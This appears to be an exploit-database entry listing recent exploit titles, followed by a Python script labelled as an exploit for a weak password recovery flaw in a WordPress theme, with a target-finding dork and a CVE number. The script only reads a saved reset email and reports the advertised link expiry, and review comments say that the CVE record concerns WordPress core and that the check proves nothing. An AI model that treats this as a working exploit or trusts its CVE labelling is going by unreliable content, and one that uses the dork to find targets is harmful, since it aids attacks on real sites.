
8 changes to exploits/shellcodes/ghdb Symantec SiteMinder WebAgent v12.52 - Cross-site scripting (XSS) BoxBilling<=4.22.1.5 - Remote Code Execution (RCE) Diafan CMS 6.0 - Reflected Cross-Site Scripting (XSS) Groomify v1.0 - SQL Injection Jobpilot v2.61 - SQL Injection Sales Tracker Management System v1.0 - Multiple Vulnerabilities Student Study Center Management System v1.0 - Stored Cross-Site Scripting (XSS) The Shop v2.5 - SQL Injection WordPress Theme Medic v1.0.0 - Weak Password Recovery Mechanism for Forgotten Password Zoneminder < v1.37.24 - Log Injection & Stored XSS & CSRF Bypass
# Exploit Title: WordPress Theme Medic v1.0.0 - Weak Password Recovery Mechanism for Forgotten Password
# Dork: inurl:/wp-includes/class-wp-query.php
# Date: 2023-06-19
# Exploit Author: Amirhossein Bahramizadeh
# Category : Webapps
# Vendor Homepage: https://www.templatemonster.com/wordpress-themes/medic-health-and-medical-clinic-wordpress-theme-216233.html
# Version: 1.0.0 (REQUIRED)
# Tested on: Windows/Linux
# CVE: CVE-2020-11027
import sys
from datetime import datetime, timedelta
from urllib.parse import urlparse

import requests
from bs4 import BeautifulSoup
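# Set the WordPress site URL and the user email address
site_url = 'https://example.com'
user_email = 'user@example.com'  # informational only; nothing below reads it

# NOTE(review): per the public CVE record, CVE-2020-11027 describes WordPress
# core (a reset link that stays valid after the password is changed, patched
# in WordPress 5.4.1) rather than a theme. Confirm the affected component
# before relying on the header of this file.
#
# NOTE(review): this script only reads the expiry time that the reset page
# advertises. It never changes a password, so its output says nothing about
# whether a password change invalidates an outstanding reset link. Do not
# treat a "short expiry" result as evidence that a site is patched.

REQUEST_TIMEOUT = 10  # seconds; requests has no default timeout and would hang
EXPIRY_MARKER = 'Password reset link will expire on'
EXPIRY_FORMAT = '%B %d, %Y %I:%M %p'


def fail(message):
    """Print *message* and stop with a non-zero exit status."""
    print(message)
    sys.exit(1)


# Get the password reset link from the user email
# You can use any email client or library to retrieve the email
# In this example, we are assuming that the email is stored in a file named
# 'password_reset_email.html'
try:
    with open('password_reset_email.html', 'r', encoding='utf-8',
              errors='replace') as f:
        email = f.read()
except OSError as err:
    fail(f'Cannot read password_reset_email.html: {err}')

soup = BeautifulSoup(email, 'html.parser')

# The first anchor carrying an href is taken to be the reset link; find()
# returns None when the message has no such anchor.
anchor = soup.find('a', href=True)
if anchor is None:
    fail('No link found in password_reset_email.html')
reset_link = anchor['href'].strip()

# The link embeds a live reset key: treat this output like a credential and
# keep it out of shared logs.
print(f'Reset Link: {reset_link}')

# The href comes from an HTML file, so it is untrusted input. Only fetch it
# when it is a web URL on the site configured above.
try:
    link_parts = urlparse(reset_link)
    site_host = urlparse(site_url).hostname
    link_host = link_parts.hostname
except ValueError as err:
    fail(f'Malformed URL: {err}')

if link_parts.scheme not in ('http', 'https'):
    fail(f'Refusing to fetch non-HTTP link: {reset_link}')
if link_host != site_host:
    fail(f'Reset link host {link_host!r} is not the configured site '
         f'{site_host!r}; refusing to fetch it.')

# Fetch the reset page
try:
    response = requests.get(reset_link, timeout=REQUEST_TIMEOUT)
except requests.RequestException as err:
    fail(f'Error fetching reset link: {err}')

if response.status_code != 200:
    fail(f'Error fetching reset link: {response.status_code} {response.text}')

# Get the expiration date from the reset link HTML
# NOTE(review): assumes the page has a <p> whose only content is a sentence
# starting with EXPIRY_MARKER -- confirm against the target page.
soup = BeautifulSoup(response.text, 'html.parser')
notice = soup.find(
    'p',
    # Tag.string is None for tags with mixed content; guard before `in`.
    string=lambda s: s is not None and EXPIRY_MARKER in s,
)
if notice is None:
    fail('Reset page does not state an expiry time; nothing to check.')

expiration_date_str = notice.text.split(EXPIRY_MARKER, 1)[1].strip()
try:
    expiration_date = datetime.strptime(expiration_date_str, EXPIRY_FORMAT)
except ValueError:
    fail(f'Unrecognised expiry date format: {expiration_date_str!r}')
print(f'Expiration Date: {expiration_date}')

# Check if the expiration date is less than 24 hours from now.
# NOTE(review): the parsed value is naive and is compared with local time;
# the page's time zone is not known from here.
if expiration_date < datetime.now() + timedelta(hours=24):
    print('Reset link is advertised to expire within the next 24 hours.')
else:
    print('Reset link is advertised to stay valid for more than 24 hours.')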